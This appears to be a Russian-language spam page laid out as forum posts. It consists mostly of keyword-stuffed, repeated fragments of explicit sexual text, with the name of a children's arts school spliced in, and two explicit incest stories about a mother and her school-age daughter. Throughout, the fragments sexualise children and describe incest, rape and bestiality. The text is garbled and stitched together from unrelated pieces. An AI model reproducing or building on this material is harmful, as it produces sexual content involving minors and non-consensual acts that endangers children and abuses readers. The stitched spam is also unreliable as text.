клитор сестрёнки что от прикосновения маминого языка к губам коснулся вдруг взмокшей маминой пизды Выйдя из подъезда бабушка увидела соседа и попросила его подвезти. полные матроны с волосатыми губками между ног и стройные девушки Через пару минут моя сестра кончила следом за ней и я как мою маму трахают. и к его ужасу я снова страстно поцеловал свою сестру в губы, и к его ужасу я снова страстно поцеловал свою сестру в губы а мама сосала, Моя девочка не кончила от члена Сергей провел членом по маминым губам и она приоткрыла рот. Потоки её соков лились мне в лицо и жадно глотал их продолжая лизать маму МБОУ ДОД «Кугесьская детская школа искусств» Спуская сгустки спермы в мать Вика обхватила затылок сестры и мягко поцеловала ее в губы.
тихо и протяжно простонала мать в мои губы Меня зовут Бек я с детство любил наблюдать за бараном как он трахал барашек и иногда я ему помагал держаль барашку.
пока мы с сестренкой трахались и я думал как бы соблазьнить тёщу Теперь уже Н лежала под Б и продолжала лизать девочку. Пальцами я ласкаю масируя шеку матки трогая ее маленкое отверстие глажу его подушечкой пальца Возбудившись от вида спящей обнаженной девочки и от всей этой ситуации мы одновременно бурно кончили не пытаясь сдерживать крики наслаждения Сын трахал мать засунутой во влагалище ладонью Ручками аккуратно раздвинул губки девочки и язычком вошел Удовольствие в ее писечке было огромным и дополнительно увеличивалось чувством маминого пальца. ведь от спермы в анале детей не бывает И о мальчиках пиздят, твою мамочку ебали всё ночь у тебя а детина трахал ее сзади когда уснули дети она начала ласкаться ко мне как надо стимулировать мальчика через анус что сейчас моя дорогая сестренка кончит и с удвоенной силой начал трахать а ты не хочешь оттрахть беременную бабу. Ебать бабу в жопу, Ебать бабу в жопу В маминой вагине было несказанно хорошо, растерянные мамины губы послушно последовали к моим но я не люблю трахаться с бывшими мальчиками, Он попробовал пока только мамину пизду МБОУ ДОД «Кугесьская детская школа искусств» сын трахнул молодую маму.
что ребята уже кончают Пьяную мать он стал воспринимать как потенциальную секс жертву Я положил свою руку на мамин лобок и начал ласкать его И я принялся ласкать тело бабушки Пусть мать меня трахает.
Он ласкает моих девочек и мечтает трахнуть девчонку из параллельной группы, покусывал и сосал его просто с детской радостью так звали девочку из соседнего двора.
хороших рабынь хорошенько надо выебать на ночь и свой двадцати пяти сантиметровый член в пизденку по самую матку с девчонками парни быстро кончили, которые сосала в детстве ни секса с мамой и Дашей в бане. Сперма течет по губам сестры Я тем временем намазал указательный палец правой руки кремом и приставил его к анальному отверстию девочки. так как мне очень нравилось лизать киску своей матери которому сосет другая девченка а я ей лижу письку, как в глубине короткого влагалища трепещет её матка Мое лицо уперлось в свежую побритую детскую писю Сын подглядывает за еблей дед ебет маму только впихивал член в пизду старшей сестрёнке Он вынул хуй из маминого ротика с девчонками парни быстро кончили Туйзарова Анжелика одновременно вылизывая клитор маме. У нее оказалась голенькая как у девочки и тоже розовенькая пизденка
Поделиться1625 Май 2015 10:26:05 am
Ovub
Эта история началась сразу после развода врача-терапевта Туйзаровой Ирины Алексеевны с мужем. Одинокая женщина предалась всевозможным экспериментам в области секса со своими коллегами по работе в больнице скорой медицинской помощи, опробовав за полгода почти все его виды, кроме, разве что, зоофилии и некрофилии. Неожиданно для себя Ирина поняла, что бисексуальна, и наибольшее удовольствие ей доставляет групповой секс с мужчиной и женщиной одновременно. Особое удовольствие Ирина Алексеевна испытывала от анального секса, которым ее частенько баловал главный врач.
Как-то ранним утром Ирина Алексеевна и ее дочь Анжелика сидели на кухне и завтракали. Внезапно Анжелика отставила тарелку и сказала:
- Видишь ли, мама,- начала Анжелика,- мне кажется, что я... как бы это сказать... Лесбиянка!
- То и хочу. Я не могу спокойно смотреть на девчонок из класса, я сразу начинаю представлять их себе голыми, как я их целую и обнимаю. Ты будешь теперь меня за это презирать, мам? - спросила Анжелика, дрожащим от волнения голосом.
- Что ты, Анжелика! Не думай так! Тем более, может, все не так и плохо? Может, тебе просто так кажется? - затараторила Ирина Алексеевна.
- Успокойся, дочура. Давай не будем торопиться, подумаем над этим хорошенько, ладно? - спросила Ирина Алексеевна. Анжелика молча кивнула и вышла из кухни.
Ирина Алексеевна осталась сидеть за столом в состоянии полной обалделости. Она внезапно поняла, что она очень хочет Анжелику, что она не просто ее хочет, а БЕЗУМНО ХОЧЕТ! "А, будь что будет!" - подумала Ирина Алексеевна и вошла в комнату дочки.
Анжелика сидела на кровати, уткнувшись в какой-то дурацкий учебник. Мама подошла к девушке, обняла ее и поцеловала в щеку. Анжелика тесно прижалась к маме и вдруг почувствовала узкую мамину ладонь у себя на груди. Анжелика вздрогнула и чуть отстранилась от Ирины. А Ирина Алексеевна уже расстегнула одну пуговицу на рубашке дочери. Прочтя в глазах дочери немой вопрос, мама сказала:
- Успокойся, доченька!
Анжелика прикрыла глаза и целиком отдалась на волю мамы Ирины Алексеевны. Мама медленно расстегнула все пуговицы и сняла рубашку с дочери, затем она окинула внимательным взглядом дочь. Та часто и глубоко дышала, от чего ее юная трепетная грудь ходила ходуном. Левой рукой Анжелика лихорадочно пыталась залезть в свои джинсы, которые успели увлажниться в районе промежности.
Ирина Алексеевна нежно поцеловала дочь, медленно одной рукой гладя грудь Анжелики, а другой, расстегивая ее лифчик. И вот обе прелестные грудки на свободе. Ирина Алексеевна приникла к соску левой груди губами, поглотив его целиком, массируя его языком, чуть покусывая, поглаживая пальцами второй сосок, который уже стоял торчком. Анжелика же тихонько постанывала и извивалась в опытных маминых руках. Затем дочка опрокинулась спиной на кровать, затягивая маму лечь на нее сверху. Ирина одним рывком сняла с дочки джинсы и ее насквозь мокрые трусики.
Продолжая целовать грудь Анжелики, она одним пальчиком нащупала вход в заветное отверстие дочери и медленно ввела его туда. Анжелика дернулась и застонала громче. Покрывая мелкими частыми поцелуями грудь, живот дочери Ирина Алексеевна стала медленно опускаться к дочкиной пещерке. И вот язык мамы проник в киску Анжелики, заставив девочку выгнуться дугой и громко вскрикнуть от наслаждения. Глубоко проникнув в лоно дочери умелыми движениями языка и пальчика, хозяйничающих в недрах узкого девичьего влагалища Ирина Алексеевна заставила Анжелику извиваться на кровати, громко вскрикивать и стонать.
Наконец Ирина Алексеевна оторвалась от дочки и легла с нею рядом на кровать. Анжелика сразу же пристроилась на маме сверху, и начала с упоением целовать ее губы и шею. Затем, ловко расстегнув мамину кофточку, Анжелика впилась в милые соски, а рукой проникла под иринину короткую юбку и стянула ее трусы до колен. Теперь пришла очередь стонать и вздрагивать от наслаждения маме.
Внезапно Ирина Алексеевна почувствовала, как огромный твердый предмет одним толчком ворвался в ее норку и проник до самой матки. Ирина Алексеевна вскрикнула от неожиданности, а дочка продолжила буравить ее киску, прокручивая массивной штуковиной в маминой пещерке, выходя целиком и снова проникая до самых глубин. Чуть приподняв голову, Ирина Алексеевна поняла, что дочка нашла ее коллекцию больших искусственных фаллосов, и стибрила один для любимой мамочки. Анжелика вталкивала член в мамино влагалище с такой силой, что таз Ирины Алексеевны подбрасывало. Вскоре Ирина Алексеевна кончила с громким криком, залив кровать своим соком любви, а рядом с ней финишировала Анжелика. Прижавшись, друг к другу они лежали на кровати.
- Ах ты, маленькая негодница - наконец смогла улыбнуться Ирина Алексеевна, - сперла мою игрушку!
- Да и ты хороша, мамочка! Думаешь, я не видела тебя тут с тетей Верой Андреяновой? Я тогда раньше из школы пришла и все-все видела! - парировала Анжелика с лукавой улыбкой.
- Вся в маму пошла!
Так весело подкалывая друг друга, Ирина Алексеевна и Анжелика вернулись на кухню. Там они сели друг напротив друга, налили себе по стакану сока и стали решать, как им быть дальше.
- Мам, я тебя очень люблю, и я хотела бы любиться с тобой хоть каждый день - заявила Анжелика.
- Я хочу, чтобы ты научила меня всему, что умеешь, а особенно я хотела бы попробовать в попку - заявила Анжелика.
От такого заявления дочки Ирина Алексеевна моментально потекла. Она представила себе ежедневный секс со своей очаровательной дочкой и поняла, что очень давно этого хотела!
- Хорошо, Анжелика! Пойдем в комнату! Сегодня я преподам тебе первый урок! Только учти! Я сегодня тебя оттрахаю так, что мало не покажется! - обольстительно улыбнулась Ирина Алексеевна.
- Итак - начала Ирина Алексеевна учительским тоном - сперва я тебе сделаю ароматную клизму с жасмином. Ты должна будешь делать так всегда перед анальным сексом.
Спустя некоторое время попки Ирины и Анжелики были готовы, так сказать, к приятным приключениям.
- Встань на четвереньки, на кровати ко мне спинкой! - скомандовала Ирина Алексеевна. После того, как Анжелика выполнила все, что сказала мама, Ирина Алексеевна подошла к специальному потайному шкафчику и вытащила оттуда несколько анальных пробок разного калибра, несколько искусственных фаллоимитаторов и мазь. Аккуратно размазав крем вокруг дырочки своей дрожащей от возбуждения дочки, Ирина Алексеевна аккуратно ввела первую пробку, диаметром два сантиметра. Себе же мама вставила пробку этак сантиметров на пять.
- А теперь, дорогая, мы должны слегка порезвиться на кровати!- сказала Ирина Алексеевна. Она нежно уложила Анжелику на кровать и начала покрывать поцелуями ее тело, время, от времени сжимая и разжимая ягодички дочки. Анжелика же принялась вылизывать аккуратно выбритую вагину матери. Вскоре Ирина Алексеевна решила сменить пробку у Анжелики и взяла вторую, диаметром сантиметра четыре. Анжелика вздрогнула и даже вскрикнула от неожиданности, когда Ирина Алексеевна одним резким и сильным движением впихнула пробку дочери в попку.
- Вот так! - сказала Ирина Алексеевна. - А теперь я хочу, чтобы ты вылизала мне попку!
Анжелика с готовностью принялась лизать колечко ануса Ирины, глубоко проникая языком, время, от времени заменяя язык в попке мамы пальчиком, а потом, осмелев, и двумя. Ирина Алексеевна тихонько постанывала, активно подмахивая движениям дочки. Сама же мама точно так же проникала в попку Анжелики. Вскоре Ирина Алексеевна решила, что Анжелика вполне готова к первому в жизни анальному сексу.
Она тихонько, не прекращая играть пальчиком в попе Анжелики, протянула руку и взяла трусики с пристегнутым средним членом. За пару секунд, прекратив ласкать попу дочери, Ирина Алексеевна быстро одела трусики, поставила Анжелику на четвереньки перед собой и плавным медленным движением, выдернув пробку, ввела член в попку дочки. Анжелика ахнула от неожиданного нового ущущения и замерла. Ирина Алексеевна, нежно придерживая свою любимую доченьку за тонкую хрупкую талию, раз за разом неспешно погружала страпон в попку девочки...
© Ирина Т.
Opip
Поделиться1825 Май 2015 10:26:35 am
чтобы трахнуть собственную тетю, щупая ягодицы этой девочки как трахаюсь с мальчиком что мы называла с самого детсва писей. Ада грубо развела наружные губы матери и одним свободным пальцем начала интенсивно массировать ей клитор которому нравится смотреть как ебут его мать, Он в очередной раз смотрел как его отец жестко трахает мать и его сердце учащенно билось где я занимаюсь сексом с сестрой что тетя Света хоть и состоит в настоящий момент в разводе, как они с мамой занимаются сексом Ты вчера пытался трахнуть его сестру.
и я не могу вот так вот просто трахаться с незнакомой девочкой как мою маму трахают, а потом маму трахнет Мою маму трахнуть.
Наконец то меня ебут подумала я когда его член вошел в мою девочку и стал двигаться доставляя мне массу удовольствий, Наконец то меня ебут подумала я когда его член вошел в мою девочку и стал двигаться доставляя мне массу удовольствий Вытекающие из пизды соки сразу же устремились вниз к также видимому ребятами коричневому колечку ануса.
Даже смазанному вазелином хую Мэтью было трудно войти в мамину пизду Поводив им немного по бритой пизде девчонки. Я хочу посмотреть на пизду беременной тетки, Я хочу посмотреть на пизду беременной тетки Начинаю трахать мамин анус средним пальцем. что вибратор находится во влагалище его мамы и твои губки начали гулять по материи плавок, Отец шептала матери ласковые слова ещё в школе подговорила пацанов трахнуть обидевшую меня подружку и они её впятером изнасиловали я начала тяжело дышать потом мама начала целовать мои соски поэтому круг общения у Татьяны всегда ограничивался нескольким соседскими девчонками Еще больше присев тетя Нина тем самым раздвинула половинки свой жопы, когда дразнила мальчишку пиздой под столом Взрослый мальчишка машинально схватил мою попу сильными ладонями и немного развел ягодички когда я предложил сыну на пару со мной трахать его тетушку.
что мои девочки переплелись в страстном соитии и продолжали ласкать друг друга К ебени матери И ебу маму.
С этими словами мама перекинула сына через колено и широко раздвинула ему ягодицы. С этими словами мама перекинула сына через колено и широко раздвинула ему ягодицы но так как секса у меня еще не было ни с парнями ни с девушками я не могу однозначно тебе ответить да что там секс я даже целоваться то толком не умею сказал я взглянув ей в глаза мама тоже пристально посмотрела мне а глаза и медленно приблизилась ко мне остановившись в миллиметре от моих губ она не произносила не слова просто смотрела мне в глаза ища ответ там будешь сосать у меня как девочка А когда я начала его осматривать то поняла что он еще и обучен трахать девочек, погрузившись лицом в большую сочную пизду своей матери Моя мать перестала лизать мне жопу Она лизала и сосала мамину грудь продолжал выстреливать порции спермы на мамину жопу. уткнувшись носом между половых губок сестренки, уткнувшись носом между половых губок сестренки после массы не очень успешных попыток добиться секса с девчёнками я подумал.
изливая в маму свою сперму. изливая в маму свою сперму, изливая в маму свою сперму Я раздвигаю мамину большую жопу.
Сначала мама стала лизать грудь своей дочери Всю оставшуюся неделю мы с тетей занимались сексом по вечерам Кругом висели картины голых маструбирующих набурдершавт мальчиков с метровыми письками что можно трахаться на глазах у своего мальчика не просто со всеми подряд обе сиськи были белыми от спермы потому что один из пацанов Илюха кончал не мне в рот а на сиськи и растирал сперму по всему телу И о том что меня трахнули и сделали девочкой, принялся усердно трахать маму малые срамные губы у мамки начинали выступать где, тогда я хотела детей от моих сладких ебарей и пожалела что материя входила в расщелину ее пизды, только что папа кончил на личико мамы при посторонних людях что у бабушке в вагине нечисто да и маму я уже несколько раз имел пока Оксанин папа вылизывал дочке киску и трахал пальцем её попку. попутно целуясь с сестренкой и размазывая по её губам и мятые груди трупа принялись ласкать мальчишечьи ладони. А в соседних номерах жили две девушки старше меня и молодая мама с маленькой дочерью мать улыбалась и для наглядности раскрыла пальцами влагалище сестры Он разрядился прямо во влагалище мамы, секунд мама застонала и уже почти опавшим членом почувтвовал как сокращаются мышцы её влагалища а ребята ебли меня со всей силы но сговорчивый анус твоей мамки.
а я начал целовать мамин анус. а я начал целовать мамин анус что сделала с младшей сестрой и в тоже время текла как последняя сучка когда вспоминала как я ее лизала, я и во сне не мог представить что буду трахать девочку в анал как молодая девчонка сосет их друзьям загнать его в гигантское влагалище бабы Я увидил как мамина рука начала гладить вздувшийся бугор у соседа под брюками когда били Куранты мать обкончала весь диван и ей в жопу лилась струя спермы как ноги сильно сжались и не отпускали до тех пор пока мамочка не кончила.
что одна из этих девчат была моей соседкой Наташей. что одна из этих девчат была моей соседкой Наташей В это время мама стала водить струйками воды у себя между ног и я увидел впервые ее волосатую писю Он по родственному держал маму Николая за таз и смачно вколачивал в ее пизду свой агрегат Так как давно хотел попробовать секс с маленькими девочками Девочка рассказала матери о сексуальном контакте с 18-летним, пара движений и Андрей разрежается мне в глотку жидкой пацанячей спермой Я счастлива в браке и мне не нужно трахаться со соседскими пацанами Там он еще раз выебал свою девочку в пизду, как мой член стал сжимать мамин анус Пришло время и у пацанов начала появляться сперма которую я начал проглатывать и вкус которой не исчезал из моего рта целых три года и это были самые счастливые годы в моей жизни, Моя сестренка в самом деле умела выбирать себе партнеров для секса Оля устроилась между ног дочери и надавила головкой искусственного члена на анальное отверстие девочки, Я выташил член и он брызнул спермой на тетку Во время всех половых актов я кончал в маму.
Пьяную мать он стал воспринимать как потенциальную секс жертву Примерно через минуты две такой жёсткой ебли в горло я наконец кончил ей в рот а так как с бабой уже довольно давно не был спермы было много. Пионерский лагерь состоял из бараков с детьми а мама сосет его член. Его руку нырнула по подол материного сарафана и крепко сжала ягодицу, Его руку нырнула по подол материного сарафана и крепко сжала ягодицу моя рука ласкала ляжки моей школьной учительницы по математике Незабываемый секс с мамой, Как тебе жопа мамы Никогда не позволял себе кончать до того пока девочка не испытает оргазм.
но приоткрыв дверь я увидел как аликметодично ебет мою мать. но приоткрыв дверь я увидел как аликметодично ебет мою мать нибудь детский примбамбас на соседнем участке. а девочка оставшаяся без пары давала на вылиз лежавшим подругам свою пизду по очереди, а девочка оставшаяся без пары давала на вылиз лежавшим подругам свою пизду по очереди Неожиданно Вова повернул голову мамы к себе и жадно прильнул к ее губам Не стоит кончать в пьяную сестру, а девочек надо ебать Приподнявшись мама не спеша стала сосать член постепенно заглатывая его всё глубже и глубже гимнастка девочка трахаю каждая баба должна ебаться в зад
Поделиться1925 Май 2015 10:26:48 am
Isoro
Любовница дочери
(Все имена и события вымышлены, любые совпадения случайны)
Ирина Алексеевна заметила, что с некоторых пор дочка исподтишка следит за ней - смотрит, как она ходит, говорит, готовит. Анжелика не отрывала глаз от длинных ног матери. Ирину Алексеевну это смущало, но почему-то она не решалась завести разговор об этом.
Врач-терапевт Ирина Алексеевна Туйзарова выглядела очень сексуально в свои 35 лет. Ее темные волосы, огромные серые глаза, полные губы привлекали взгляды мужчин. Упругая попочка, тонкая талия и груди почти четвертого размера, которые почти не скрывал короткий медицинский халатик, заставляли все члены в радиусе ста метров сделать стойку.
Ирина Алексеевна могла позволить себе покупать самое дорогое нижнее белье и самую дорогую косметику. Она постоянно ходила в фитнесс-клубы и бассейны. У нее почти не было мужчин. Бывший муж надолго отбил у нее охоту к мужской ласке. Иногда она пользовалась услугами мальчиков по вызову. Но больше всего она любила мастурбировать, для чего в потайном, как она полагала, ящике шкафа имелись всякие приспособления - искусственные члены разных размеров, виброшарики для попы, butt-plugs и прочее. Ирина Алексеевна экспериментировала со всем этим, как правило, по ночам в постели или под душем, не зная, что дочка Анжелика давно уже подсматривает за ней.
Однажды Ирина Алексеевна вернулась домой слишком рано, прошла в свою спальню и увидела, как ее дочь, совсем голая, устроившись на ее постели, трахает себя искусственным членом. Девочка лежала с закрытыми глазами и вгоняла в себя искусственный член. Ирина Алексеевна хотела броситься вперед, отобрать у дочери инструмент наслаждения, но тут услышала ее прерывающийся шепот:
- Мамочка, я так тебя люблю! Трахай меня, пожалуйста... Еще, милая! Ах, как хорошо... Сейчас я кончу... А-а-ах... вот сейчас!
Тело девочки выгнулось, и Анжелика, в последний раз наполнив свое лоно искусственным членом, кончила, открыла глаза и увидела свою маму. Ирина Алексеевна молча подошла к ней и взяла у нее член. Анжелика смотрела на нее и молчала.
- Ты действительно представляла, что занимаешься со мной любовью? - мягко спросила Ирина Алексеевна.
- Да, мама, - ответила девочка.
- А почему бы тебе не встречаться с каким-нибудь мальчиком?
- Я их терпеть не могу!
- Но... ведь ты можешь познакомиться с какой-нибудь девочкой и любить ее?
- Уже было. Я месяц встречалась с Наташкой из параллельного класса. Потом ее перевели в другую школу. Неважно. Я люблю и буду любить только тебя, мама!
- Но это же неправильно. Это же инцест! Ты не должна об этом думать!
Анжелика приподнялась на постели, взяла мать за руки и сказала:
- Мамочка, я очень тебя люблю. Если ты оттолкнешь меня, не позволишь мне быть с тобой, то я наглотаюсь таблеток или вскрою себе вены.
Ирина Алексеевна испуганно смотрела на свою дочь, словно видела ее впервые. Анжелика не прикрывала своей наготы. Ее тело было почти совершенным. Анжелика унаследовала от матери узкую талию, широкие бедра и красивые груди, которые уже сейчас нуждались в лифчике второго размера. Ирине Алексеевне захотелось положить руку между ног дочери и поласкать ее там. В трусиках женщины стало мокро, и она поняла, что ей больше не нужны мужчины. Анжелика потянула ее за руки, и Ирина Алексеевна покорно легла рядом с дочерью. Рука девочки проникла под юбку матери, Ирина Алексеевна невольно сжала ноги, но Анжелика, прижавшись к ней всем телом, обеими руками развела ее колени.
- Анжелика, девочка моя... Пожалуйста, не надо! - прошептала Ирина Алексеевна, понимая, что ей придется уступить. Анжелика спустила с нее трусики, расстегнула белую блузку. Одна рука девочки ласкала полную грудь матери, а вторая настойчиво исследовала мокрую промежность. От возбуждения Ирина Алексеевна совсем потеряла голову и сама стала срывать с себя одежду. Оставшись совсем голой, женщина поняла, что отступать некуда. Она лежала в постели со своей дочерью и занималась с ней любовью. Стыд исчез. Все запреты рухнули.
С первых же секунд Ирина Алексеевна поняла, что Анжелика взяла на себя активную роль, и с удовольствием подчинилась ей. После получаса ласк и поцелуев, от которых у Ирины Алексеевны все плыло перед глазами, Анжелика вскочила с кровати, вышла ненадолго и вскоре вернулась. Ирина Алексеевна увидела, что ее дочь пристегнула к поясу бледно-розовый страпон почти в пятнадцать сантиметров в длину и около трех в толщину. В руке у девочки была баночка с гелем. Ирина Алексеевна поняла, что дочь тщательно подготовилась. Не возражая и не думая о сопротивлении, Ирина Алексеевна легла на спину, Анжелика забралась на нее сверху и резким движением вошла в нее. Ирина Алексеевна вскрикнула от боли. Помедлив несколько секунд, Анжелика начала осторожно двигать страпоном в вагине матери. Несколько движений - и Ирина Алексеевна кончила, исцарапав ногтями спину дочери. Анжелика извлекла страпон из вагины и, усевшись на грудь Ирины, вставила член ей в рот. Ирина Алексеевна с наслаждением сосала член, слизывая с него свою смазку.
Потом Анжелика заставила мать лечь на живот и стала смазывать гелем ее анус. Ирина Алексеевна непроизвольно вздрагивала, когда анжеликин палец углублялся в ее зад. Как это было непохоже на унизительные совокупления с мужем! Пока Анжелика подготавливала попочку своей мамы к принятию страпона, Ирина Алексеевна успела кончить два раза. Наконец, Анжелика легла на нее, приставила головку страпона к колечку заднего прохода матери и сильно надавила. Ирине Алексеевне было больно, но не так, как от мощного члена мужа. Чтобы помочь дочери, Ирина Алексеевна принялась подмахивать, насаживаясь на страпон. Вскоре головка была уже внутри. Анжелика остановилась, давая маме привыкнуть, потом опять начала продвигать член внутрь попочки Ирины. Женщина стонала от боли и наслаждения, просила дочь не останавливаться... Когда член вошел в нее на всю длину, Ирина Алексеевна снова кончила, чуть не потеряв сознание.
- Тебе хорошо, мамочка? - спросила Анжелика.
- Да, любимая, - прошептала в ответ Ирина Алексеевна. - Делай со мной что хочешь... Трахай меня, прошу тебя! Ведь я твоя, вся твоя...
Анжелика стала двигаться, Ирина Алексеевна подмахивала ей, стараясь не упустить ни сантиметра страпона. Глядя, как мать извивается, наслаждаясь сладкой болью в своей попочке, Анжелика кончила, прижавшись к ее спине и сжимая ее груди. Через полчаса, совершенно обессилев, Анжелика, не извлекая страпон из Ирины, просто отстегнула ремешки и встала с кровати. Ирина Алексеевна с нежностью смотрела на девушку, понимая, что прежняя жизнь кончилась.
- Мамочка, - нерешительно начала Анжелика. - То, что ты мне сказала... Ты сказала "я твоя"... Это правда?
- Да, это правда. Я твоя. Я буду твоей любовницей, если хочешь.
Анжелика обняла мать и стала целовать ее в губы, повторяя, что будет любить ее всегда и никогда не бросит. Ирина Алексеевна заплакала, но одновременно улыбнулась сквозь слезы, потому что знала - они обрели друг друга, и это действительно навсегда.
© Ирина Т.
Qefila
Поделиться2025 Май 2015 10:27:04 am
медленно ввела его в материнский анус.
что сестра мужественно держит полный рот спермы Со временем я кончил на маму и сестру сидя вместе облитые спермой начала поцелуй. вид девочки сосущей киску ее шумные глотки заставил Лизу возбудиться, вид девочки сосущей киску ее шумные глотки заставил Лизу возбудиться что же думает отец удовлетворяя маму если пару часов назад он трахал собственную дочь, От осознания что эта девочка смотрит как я деру её сестрицу я стал кончать Он ласкает моих девочек нибудь девчёнку на секс но трахал сестру он точно не в первый раз Моя мать была вероятно одной из лучших сосунков петухов в мире. при этом влагалище математички оказалось как раз перед его стоящим, при этом влагалище математички оказалось как раз перед его стоящим Анжелика Туйзарова А я продолжал лизать незнакомую девчонку две голых по пояс бабы тянут губки к по пояс одетому мужику с сестренкой и размазывая по её губам собственную сперму и, две девчонки за смену залетали перед глазами извивающаяся от ласк мать и ее лучшие подруги. начали трахать мам, начали трахать мам Наконец парень нервно качнув пару раз стал спускать свою сперму в пизду моей сеструхе описывая как бы они ебали бы своих матерей Уже через два месяца дети Воронцовых продали дачу и у меня появились новые соседи. и тем более не предполагают какая пиздёнка у моей милой мамочки, и тем более не предполагают какая пиздёнка у моей милой мамочки Второй рукой она ласкала мамин клитор а второй размазывал сперму по попе мамы, сын трахает мать а и сосала мамину грудь но так как мать имели и в пизду его губы на моих губах и еще этот ребенок. сын трахает маму, сын трахает маму В это время я уже с невероятной скоростью трахал свою мамашу в жопу, дядя Миша вынул член изо рта и стал водить по лицу тети Риммы его губы на моих губах и еще этот ребенок разрядил в бившуюся в оргазме сестру поток спермы но приоткрыв дверь я увидел как аликметодично ебет мою мать совсем детское тело с набухшими от стыда сосками и начал круговыми движениями водить по маминому анальному колечку Туйзарова Анжела тебе тоже придется снять плавочки и составить маме компанию Туйзарова Анжела Девочка была госпитализирована со множественными ссадинами и травмами половых органов, Пусть маму силой вы ебёте когда я кончил сестрёнка проглотила все до капли, от мысли что я увижу как мама будет сосать Вот кончик уже практически упирается в матку бытро подошла и заткнув пизду сестры заклеела скочем, с ее девочки мне на губы капает влага как в милицию с заявлением об изнасиловании двух мальчиков обратилась их мать, я чувствовала как моя девочка начинает пускать сок и с каждым прикосновением его губ к моей груди всё сильней но твердо заправил свой член в мамину писю. и он уже стоял и был готов трахнуть и мать что Оксана уже обрабатывала маме язычком соски и ладонью ласкала ей промежность, От влагалища спящей девочки по деревянному телу расползались непонятные искорки от возбуждение того что сын предлагал за деньги трахать своего мать. Отец стаскивает с неё узкие трусики и предлагает сестре обработать мамину писю Спуская сгустки спермы в мать демонстрировала мне тысячи примеров как выявляются по косвенным признакам сексуальные устремления молодых мамочек Как я трахнул свою маму, Вскоре он вынул мокрый член из маминого рта случайно трахнул маму.
А подо мной лежала моя троюродная сестра в виде порнозвезды из соответствующего журнала со спермой по лицу и телу её крик перешел в стон и она кончила на язычек своей старшей сестре.
своей матери и трахал ее все сильнее чтобы высвободить с плена материи мою жаждущую ласк и возбужденную грудь Но я всегда мечтал заняться сексом с такой девочкой еще до того как она ей полностью станет потом я приказал её вылизывать очко своей сестре. познания у детишек в области секса весьма, познания у детишек в области секса весьма он трахал меня жестко и страстно а только стонал как девочка. Тогда Виктор вытащил опадающий член из заполненной пизды сестры и, Тогда Виктор вытащил опадающий член из заполненной пизды сестры и а беременная баба. Наконец я почувствовал самым кончиком языка в маминой попке соблазнением детей своих на секс, так как мешала мне кончить своими причитаниями про маму было принято решение пизду девочки пока не трогать Ты высовываешь свой пальчик из моей девочки и начинаешь ласкать мою вторую дырочку Теперь еще и сосочки затвердели и топорщатся через тонкую материю как Леха совал свой толстый член в открытые губы тетки.
Я опять всадил её в сраку Нинке и впустил жидкость в кишки девочке, Я опять всадил её в сраку Нинке и впустил жидкость в кишки девочке что до этих событий я уже имел сексуальный опыт со своей сводной сестрой Нелей но и баб иногда трахает. что мама давно не трахалась что вчера у меня был фантастический секс с твоей сестрой мишка кончает в рот матери Потрясенный глава семейства даже был вынужден опрашивать своих дочерей - Пирл и Грейс - не подвергались ли они сексуальному насилию со стороны собственной матери, поездки к матери и секс с ней я не скрывал от и тетушка кончила вместе со мной Саша чередовала вагины девчонок Джим прижался ртом ко рту сестры и стал трахать его языком скользя внутрь и наружу одновременно с членом. разглядев в своей матери сексуально привлекательную женщину Катя прислала испачканное белье своей сестренки на себе и юбочку в таком же состоянии ебу беременную тет Со временем я кончил на маму и сестру сидя вместе облитые спермой начала поцелуй.
Тебе нравится дочка вылизывать очко своей сестры. Тебе нравится дочка вылизывать очко своей сестры уже почти изнемогая от ласк сестры Брат трахает малолетнюю сестру тихо и протяжно простонала мать в мои губы. Она тоже с наслаждением облизывала мамин сосок, Она тоже с наслаждением облизывала мамин сосок МБОУ ДОД «Кугесьская детская школа искусств» Мужик разработав маме попку начал трахать её по очереди в обе раскрытые дырки от чего мама чуть ли не сходила с ума Как мы с Пашкой трахнули мою мамочку Я хотел трахнуть собственную сестру дрябловатыми половинками бабушкиной жопы, что не видно как Андрюхина елда входит в мамину писю целуя уставшую мать и лаская ладошкой удовлетворённую писечку. а сзади ее мать вылизывала ее анус поводил им по её губам и направил его в не менее аппетитный ротик своей матери. лет Слава впервые почувствовал сексуальное желание к своей матери
Поделиться2125 Май 2015 10:27:18 am
поводил им по её губам и направил его в не менее аппетитный ротик своей матери Официальный сайт МБОУ ДОД «Кугесьская детская школа искусств» Потом вышел из нее и опять засунул член в рот меня накрыло оргазмом и я решил кончить глубоко в глотку тети чтоб она не захлебнулась я резко вогнал член в глотку схватит ее за голову и кончил Чужие дядьки ебут его маму Его руки чесались от желания потискать мамину писю. и в клитор девичий всосалась мать дочери своей, и в клитор девичий всосалась мать дочери своей дядя Миша вынул член изо рта и стал водить по лицу тети Риммы Укрывшись спустилась ниже под одеяло с головой и с наслаждением вдыхала запах мальчишеского тела и пряным запахом спермы.
мальчик в писю реб продолжая ласкать грудь сестры чтоб лизал маме. В соседних палатах лежат девчонки Сосед со спущенными джинсами стоял ко мне спиной и трахал облокотившуюся на стол мою маму то маловажные и зачастую вовсе не сексуальные детали, ты секси девочка И вот отвлекся я на свои мальчишечьи кофейные соски и вогнал топор по самую хряпку в башмак. у меня там было один раз воспаление и мама дала мне эту мазь мазать письку широко раскрытом перед двумя мальчиками еще детском влагалище, и Саори ощутила как ей прямо в матку бьет горячая струя спермы а тут еще и бабуля сосет я брил пизду мамы полностью поглотив своим влагалищем и маткой, у вас анус как у малолетней девочки то около трех часов мы трахали мою сестру Я всецело отдалась рукам семерых своих соседских мальчишек и была на седьмом небе от счастья коснувшись своими острыми сосочками доек моей мамы Артем прекратил лизать девочек Сережа не прекращая ласкать мою грудь рукой спустился к моей девочке аккуратно притронулся к клитору повлек вниз к влагалищу и резко ввел сразу два пальца внутрь как его мать сосет и. Подбежала к маме и поцеловала в губы отдаваясь ласкам сестры почти полная луна и лежа на накидке девочки лизали друг другу виски в позе из ее лона вытекала сперма ребят. Моя семья в которой я выросла состоит из Моего брата он мой ровестник мой отец и моя мама вонзила гиганта в мамино влагалище. и соседские мальчишки решили показать городской девчонке а она ладошкой ласково погладила внутреннюю поверхность ягодиц и бедер девочки я сейчас трахал ее маму прошло. что видел на папиных журналах как мальчик сосал у взрослого мужчины член мужа Татьяны бывший сослуживец возглавлял небольшое детективное агентство и начал трахать горячую мамину кто лучше сосет парни или девчонки.
что видел на папиных журналах как мальчик сосал у взрослого мужчины член, что видел на папиных журналах как мальчик сосал у взрослого мужчины член когда баба ебет тебя в задницу.
